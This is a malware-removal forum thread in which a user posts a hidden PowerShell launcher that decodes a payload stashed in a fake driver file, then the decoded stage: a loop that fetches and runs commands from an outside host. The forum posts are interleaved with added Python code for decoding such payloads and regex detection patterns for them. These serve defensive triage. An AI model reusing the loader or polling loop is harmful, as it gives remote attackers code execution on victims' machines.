
malware powershell script running after boot

Post by jeancremers » June 15th, 2022, 5:26 am

Since some update, I have had this PowerShell script running some time after a boot.

This is the command line, obviously some malware but what?
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n; $sc = [System.Text.Encoding]::UTF8.GetString([System.IO.File]::ReadAllBytes('C:\Windows\System32\drivers\SkVSjq0D9\DA4A1F43-F9E8-4A62-988D-3DDAC0ECE249.sys'), 1560279, 410); $sc2 = [Convert]::FromBase64String($sc); $sc3 = [System.Text.Encoding]::UTF8.GetString($sc2); Invoke-Command ([Scriptblock]::Create($sc3))}

I can't find the parent.
I've been told the command goes: read 410 bytes from position 156027, decode 64, then turn into a string and execute.

Thanks for help!
jeancremers
Active Member
 
Posts: 4
Joined: June 15th, 2022, 5:17 am
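For anyone triaging a launcher like the one quoted above, the useful first step is to recover the second stage without executing it: the command line names the carrier file, a byte offset and a byte count, and the slice at that position is base64 text that decodes to the next script. The following Python is an added example (not code from the thread or from the forum) that parses that idiom out of a command line and decodes the slice. The carrier bytes, the placeholder path and the embedded script are all constructed here for the demo; on a real machine the caller would pass a function that reads the named file from disk.

```python
import base64
import re
from typing import Callable, Dict, Optional

# The staging idiom seen in the command line: GetString(ReadAllBytes('path'), offset, count)
STAGER_RE = re.compile(
    r"ReadAllBytes\('(?P<path>[^']+)'\)\s*,\s*(?P<offset>\d+)\s*,\s*(?P<count>\d+)\s*\)",
    re.IGNORECASE,
)


def parse_stager(cmdline: str) -> Optional[Dict[str, object]]:
    """Return the carrier path, offset and count if the command line uses the file-slice stager."""
    m = STAGER_RE.search(cmdline)
    if m is None:
        return None
    return {"path": m.group("path"), "offset": int(m.group("offset")), "count": int(m.group("count"))}


def extract_payload(carrier: bytes, offset: int, count: int) -> str:
    """Decode the base64 slice at [offset, offset+count) into the second-stage script text."""
    if offset < 0 or count <= 0 or offset + count > len(carrier):
        raise ValueError("offset/count fall outside the carrier file")
    b64_text = carrier[offset:offset + count].decode("utf-8")
    return base64.b64decode(b64_text, validate=True).decode("utf-8")


def recover_stage_two(cmdline: str, read_file: Callable[[str], bytes]) -> str:
    """Parse the command line, read the carrier via read_file, and return the decoded script (never runs it)."""
    info = parse_stager(cmdline)
    if info is None:
        raise ValueError("command line does not use the file-slice stager idiom")
    return extract_payload(read_file(str(info["path"])), int(info["offset"]), int(info["count"]))


# --- constructed sample data (not taken from the infected machine) -----------------
INNER_SCRIPT = "Write-Output 'stage-two placeholder'"          # stands in for the real second stage
B64_PAYLOAD = base64.b64encode(INNER_SCRIPT.encode("utf-8"))
PAYLOAD_OFFSET = 64
CARRIER = b"\x00" * PAYLOAD_OFFSET + B64_PAYLOAD + b"\xff" * 32  # junk, payload, junk
CARRIER_PATH = r"C:\Windows\System32\drivers\PLACEHOLDER\PLACEHOLDER.sys"  # placeholder path

SAMPLE_CMDLINE = (
    "powershell.exe -NonInteractive -WindowStyle Hidden -Command &{$sc = "
    "[System.Text.Encoding]::UTF8.GetString([System.IO.File]::ReadAllBytes("
    "'C:\\Windows\\System32\\drivers\\PLACEHOLDER\\PLACEHOLDER.sys'), "
    f"{PAYLOAD_OFFSET}, {len(B64_PAYLOAD)}); "
    "$sc2 = [Convert]::FromBase64String($sc); "
    "Invoke-Command ([ScriptBlock]::Create([System.Text.Encoding]::UTF8.GetString($sc2)))}"
)


def demo() -> str:
    """Recover the embedded script from the constructed carrier instead of a file on disk."""
    files = {CARRIER_PATH: CARRIER}
    return recover_stage_two(SAMPLE_CMDLINE, files.__getitem__)


if __name__ == "__main__":
    print(parse_stager(SAMPLE_CMDLINE))
    print(demo())
```

Against a real system you would call `recover_stage_two(cmdline, lambda p: open(p, "rb").read())` with the command line taken from the scheduled task or process record, then read the decoded text rather than executing it; the thread's second post shows what such a decoded stage looks like.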

Re: malware powershell script running after boot

Post by jeancremers » June 15th, 2022, 6:30 am

This is the script; I blocked the URL in the hosts file.

# Poll the remote URL forever; whatever text comes back is run as a new job.
while ($true) {
    try {
        $r = Invoke-RestMethod -Uri 'http://wmail-service.com/v1/CECCE2DA-EF51-4D10-B16A-726EEBC7E043?v=Downloads_Counter12'
        if ($r -ne '') {
            # Compile the response into a script block and execute it, waiting for it to finish
            Start-Job ([ScriptBlock]::Create($r)) | Wait-Job
        }
    }
    catch {}   # any error (for example a blocked host) is swallowed and the loop simply retries
    Start-Sleep 2
}
jeancremers
Active Member
 
Posts: 4
Joined: June 15th, 2022, 5:17 am
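The two scripts in this thread share traits that are easy to flag in PowerShell script block logging (Event ID 4104) or process command-line telemetry: a hidden window, a base64 slice read out of a file, a script block built from a string at run time, an endless poll loop with a swallowed catch, and a ".sys" carrier under the drivers folder. The Python below is an added detection example (not code from the thread or from the forum) that scores script text against those indicators. The three sample script texts are constructed for the demo with placeholder paths and a placeholder URL; they mirror the shape of the launcher and the poll loop posted above.

```python
import re
from typing import Dict, List

# Indicator name -> case-insensitive regex over the script text. The patterns are
# derived from the launcher and poll loop quoted in this thread; they are a constructed
# example, not a vendor rule set, and are meant to be tuned against local baselines.
INDICATORS: Dict[str, "re.Pattern[str]"] = {
    "hidden_window": re.compile(r"-WindowStyle\s+Hidden", re.I),
    "policy_override": re.compile(r"-ExecutionPolicy\s+(Bypass|Unrestricted|RemoteSigned)", re.I),
    "file_slice_base64": re.compile(
        r"ReadAllBytes\(.*?\)\s*,\s*\d+\s*,\s*\d+\s*\).*?FromBase64String", re.I | re.S
    ),
    "dynamic_scriptblock": re.compile(r"\[ScriptBlock\]::Create\(", re.I),
    "infinite_loop": re.compile(r"while\s*\(\s*\$true\s*\)", re.I),
    "web_fetch": re.compile(r"Invoke-RestMethod|Invoke-WebRequest|DownloadString", re.I),
    "empty_catch": re.compile(r"catch\s*\{\s*\}", re.I),
    "sys_ext_in_drivers": re.compile(r"\\drivers\\[^\\']+\\[^']+\.sys", re.I),
}


def match_indicators(script_text: str) -> List[str]:
    """Return the names of every indicator that matches, in table order."""
    return [name for name, rx in INDICATORS.items() if rx.search(script_text)]


def is_suspicious(script_text: str, threshold: int = 3) -> bool:
    """A script is flagged when at least `threshold` distinct indicators fire (threshold is an assumption)."""
    return len(match_indicators(script_text)) >= threshold


def triage(blocks: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each logged script block (by label) to the indicators it triggered, keeping only flagged ones."""
    return {label: match_indicators(text) for label, text in blocks.items() if is_suspicious(text)}


# --- constructed sample script blocks (placeholders, not data from the infected machine) ---
SAMPLE_LAUNCHER = (
    "powershell.exe -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{"
    "$sc = [System.Text.Encoding]::UTF8.GetString([System.IO.File]::ReadAllBytes("
    "'C:\\Windows\\System32\\drivers\\PLACEHOLDER\\PLACEHOLDER.sys'), 1000, 400); "
    "$sc2 = [Convert]::FromBase64String($sc); "
    "Invoke-Command ([ScriptBlock]::Create([System.Text.Encoding]::UTF8.GetString($sc2)))}"
)
SAMPLE_POLL_LOOP = (
    "while ($true) { try { "
    "$r = Invoke-RestMethod -Uri 'http://c2.example.invalid/v1/PLACEHOLDER?v=Downloads_Counter12'; "
    "if ($r -ne '') { Start-Job ([ScriptBlock]::Create($r)) | Wait-Job } "
    "} catch {} Start-Sleep 2 }"
)
SAMPLE_BENIGN = (
    "Get-ChildItem -Path C:\\Users -Recurse | Where-Object { $_.Length -gt 1MB } "
    "| Sort-Object Length -Descending"
)


def demo() -> Dict[str, List[str]]:
    return triage({"launcher": SAMPLE_LAUNCHER, "poll_loop": SAMPLE_POLL_LOOP, "benign": SAMPLE_BENIGN})


if __name__ == "__main__":
    for label, hits in demo().items():
        print(f"{label}: {', '.join(hits)}")
```

Run over exported 4104 events or a process-creation feed, `triage` gives a short list of blocks worth a human look; the benign housekeeping command scores zero, while each of the two malicious shapes trips four or more indicators even with the real path and URL replaced.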

Re: malware powershell script running after boot

Post by jeancremers » June 15th, 2022, 8:58 am

I also deleted the system32\drivers\SkVSjq0D9\ folder and rebooted 4 hours ago; the process has not come back since.
jeancremers
Active Member
 
Posts: 4
Joined: June 15th, 2022, 5:17 am

Re: malware powershell script running after boot

Post by pgmigg » June 26th, 2022, 9:08 pm

Unfortunately, as you have replied to your own topic, the topic must be closed, as it would likely go unnoticed by helpers who are looking for topics that have only a single post.

May I draw your attention to the topic: ALL USERS OF THIS FORUM MUST READ THIS FIRST, which you should have read before posting for help.

The section here explains why you should not reply to your topic before a helper replies.

Please start a new topic with just a single post, and this time attach your logs, then wait for a helper to reply. Thank you for your understanding.

This topic is now closed.
pgmigg
Admin/Teacher
 
Posts: 5457
Joined: July 8th, 2008, 1:25 pm
Location: GMT-05:00

